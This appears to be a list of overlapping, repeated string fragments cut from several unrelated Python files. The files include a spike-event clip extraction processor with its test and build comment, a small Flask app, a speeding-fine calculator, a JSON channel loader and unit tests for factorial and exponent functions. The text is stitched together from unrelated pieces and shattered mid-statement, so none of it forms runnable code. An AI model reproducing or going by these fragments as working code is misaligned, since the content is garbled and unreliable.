TimeseriesChunkReader # import the C++ code # we no longer use cppimport", "extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT", "timeseries mda file (MxN) from which to draw the event clips (snippets) firings", "writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code # we no", "\"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size", "firings mda file (RxL) where R>=2 and L is the number of events.", "OUTPUT Path of clips mda file (MxTxL). 
T=clip_size clip_size : int (Optional) clip", "-O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix`", "parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the", "def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda')", "-Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy", "return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L))", "clip size, aka snippet size, aka number of timepoints in a single clip", "np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running test') test_extract_clips()", "sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++", "sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import", "of timeseries mda file (MxN) from which to draw the event clips (snippets)", "we no longer use cppimport # import cppimport # 
cpp=cppimport.imp('basic_cpp') # Do this", "clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None", "\"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT Path", "not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000", "of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def", "clip_size : int (Optional) clip size, aka snippet size, aka number of timepoints", "a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N", "--includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def", "cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3", "# import the C++ code # we no longer use cppimport # import", "clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2()", "ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) 
t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__", "spike events Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN)", "the event clips (snippets) firings : INPUT Path of firings mda file (RxL)", "basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100):", "-std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp", "number of events. Second row are timestamps. clips_out : OUTPUT Path of clips", "L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100,", "-fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as", "INPUT Path of timeseries mda file (MxN) from which to draw the event", "corresponding to spike events Parameters ---------- timeseries : INPUT Path of timeseries mda", "size, aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size)", "-shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import", "-m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp 
processor_name='pyms.extract_clips'", "timeseries : INPUT Path of timeseries mda file (MxN) from which to draw", "size, aka snippet size, aka number of timepoints in a single clip \"\"\"", "timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False):", "cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return", "times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L))", "def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries :", "TimeseriesChunkReader # import the C++ code # we no longer use cppimport #", "extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips", "F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size", "Path of clips mda file (MxTxL). T=clip_size clip_size : int (Optional) clip size,", ": int (Optional) clip size, aka snippet size, aka number of timepoints in", "mda file (MxTxL). 
T=clip_size clip_size : int (Optional) clip size, aka snippet size,", "(Optional) clip size, aka snippet size, aka number of timepoints in a single", "def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a", "import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader #", "True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version", "events. Second row are timestamps. clips_out : OUTPUT Path of clips mda file", "import numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from", "---------- timeseries : INPUT Path of timeseries mda file (MxN) from which to", "basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike", "file (MxTxL). 
T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka", "in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries)", "# cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC", "clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def", "cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3", "mda file (MxN) from which to draw the event clips (snippets) firings :", "L is the number of events. Second row are timestamps. clips_out : OUTPUT", "timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size :", "T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2,", "import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared", "-I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding", "and L is the number of events. Second row are timestamps. 
clips_out :", "T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka number of", "writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0]", ": INPUT Path of timeseries mda file (MxN) from which to draw the", "Second row are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL).", "no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first:", "<filename>basic/p_extract_clips.py<gh_stars>1-10 import numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda", "= X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return", "processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ----------", "(snippets) firings : INPUT Path of firings mda file (RxL) where R>=2 and", "pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1'", "Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT Path of", "def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); 
cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if", "return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info):", "aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return", "processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries", "extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F');", "clips (snippets) firings : INPUT Path of firings mda file (RxL) where R>=2", "times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return", "from which to draw the event clips (snippets) firings : INPUT Path of", "(MxTxL). 
T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka number", "cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11", "extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T)", "clips corresponding to spike events Parameters ---------- timeseries : INPUT Path of timeseries", "this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes`", "firings : INPUT Path of firings mda file (RxL) where R>=2 and L" ]
[ "import render_template from webapp import app from webapp.route import bp from webapp.database import", "webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index():", "render_template from webapp import app from webapp.route import bp from webapp.database import setup", "from webapp import app from webapp.route import bp from webapp.database import setup #", "app from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/')", "import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return", "webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def", "import app from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup()", "from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def", "# app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error): return render_template('error.html')", "<filename>webapp/project.py from flask import render_template from webapp import app from webapp.route import bp", "from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404)", "from flask import render_template from webapp import app from webapp.route import bp from", "bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html')", "setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error): return", "webapp import app from webapp.route import bp from 
webapp.database import setup # app.register_blueprint(bp)", "flask import render_template from webapp import app from webapp.route import bp from webapp.database", "import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error):" ]
[ "vel = int(input('Digite a velocidade que o carro está: ')) if vel >", "if vel > 80: print('Você foi multado em {} reais'.format((vel - 80) *", "')) if vel > 80: print('Você foi multado em {} reais'.format((vel - 80)", "o carro está: ')) if vel > 80: print('Você foi multado em {}", "que o carro está: ')) if vel > 80: print('Você foi multado em", "a velocidade que o carro está: ')) if vel > 80: print('Você foi", "carro está: ')) if vel > 80: print('Você foi multado em {} reais'.format((vel", "velocidade que o carro está: ')) if vel > 80: print('Você foi multado", "está: ')) if vel > 80: print('Você foi multado em {} reais'.format((vel -", "= int(input('Digite a velocidade que o carro está: ')) if vel > 80:", "vel > 80: print('Você foi multado em {} reais'.format((vel - 80) * 7))", "int(input('Digite a velocidade que o carro está: ')) if vel > 80: print('Você" ]
[ "json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close() return", "<filename>resource/globals.py import json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read())", "import json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close()", "def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close() return parsed" ]
[ "and (val_a + delta) >= val_b return (not (val_a + delta) < val_b)", "val_b return (not (val_a + delta) < val_b) and (not (val_b + delta)", "(val_a + delta) >= val_b return (not (val_a + delta) < val_b) and", "fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f,", "assert ([1] + [a for a in [1] for b in range(1, num", "{0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1):", "fn1, base, num in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0),", "teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin():", "9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a", "# -*- coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import,", "== fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for", "fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base ** num))", "{0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num", "print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct, zip,", "** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 *", "[1] for b in range(1, num + 1) for a in [a *", "delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta)", "in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f in", "= abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta) >=", "+ 1):]) for ndx, axis in 
enumerate(axis_bounds) for el in axis] return set(bound_vals)", "max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m) //", "object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) -", "abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a", "set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function):", "in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for b", "{{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b)", "for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert", "import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex,", "# (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta)", "+ 1, (min_m + max_m) // 2, max_m - 1, max_m) for (min_m,", "print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__))", "print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown", "tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance)", "axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module:", "in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - 
tolerance) <= abs(val_b) and # (abs(val_a) +", "# for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0]", "[3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) ==", "(min_m + max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in", ">= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a", "20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert", "[a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f,", "* b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b,", "for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m +", "classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base,", "[2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i,", "bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f in [classic.fact_i,", "== fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base **", "(3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n in [3.0,", "= [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds =", "{0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in", "module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture", "for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins", "division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct,", "def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): 
{0}\".format(request.function.__name__)) request.addfinalizer(fin)", "#assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num),", "test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b, n) in", "f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base", "pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from", "__future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter,", "from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <=", "ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup", "val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m)", "num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in", "in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m) // 2,", "def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup", "= [(min_m, min_m + 1, (min_m + max_m) // 2, max_m - 1,", "[(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m,", "num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base", "axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__))", "function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for", "for ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def 
setup_module(module):", "def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)])", "#return (val_a - delta) <= val_b and (val_a + delta) >= val_b return", "+ delta) < val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups):", "n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base **", ">= val_b return (not (val_a + delta) < val_b) and (not (val_b +", "module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii,", "1, (min_m + max_m) // 2, max_m - 1, max_m) for (min_m, max_m)", "val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance)", "in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num)", "val_b and (val_a + delta) >= val_b return (not (val_a + delta) <", "([1] + [a for a in [1] for b in range(1, num +", "for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1]", "fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n", "- tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta =", "axis_bounds = [(min_m, min_m + 1, (min_m + max_m) // 2, max_m -", "utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals)", "a in [1] for b in range(1, num + 1) for a in", "in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__))", "and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a -", "1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] +", "{0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) 
@pytest.fixture def", "classic.fact_lp]]: assert ([1] + [a for a in [1] for b in range(1,", "def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a)", "import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and", "(b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0,", "range(1, num + 1) for a in [a * b]])[-1] == fn1(num) def", "< val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m,", "in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base **", "n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0]", "f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for", "zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a)", "coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function,", "(val_a + delta) < val_b) and (not (val_b + delta) < val_a) def", "10.0)]) # for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0,", "<= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return", "- 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el]", "and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m +", "(abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <=", "[(min_m, min_m + 1, (min_m + max_m) // 2, max_m - 1, max_m)", "oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return", "setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def 
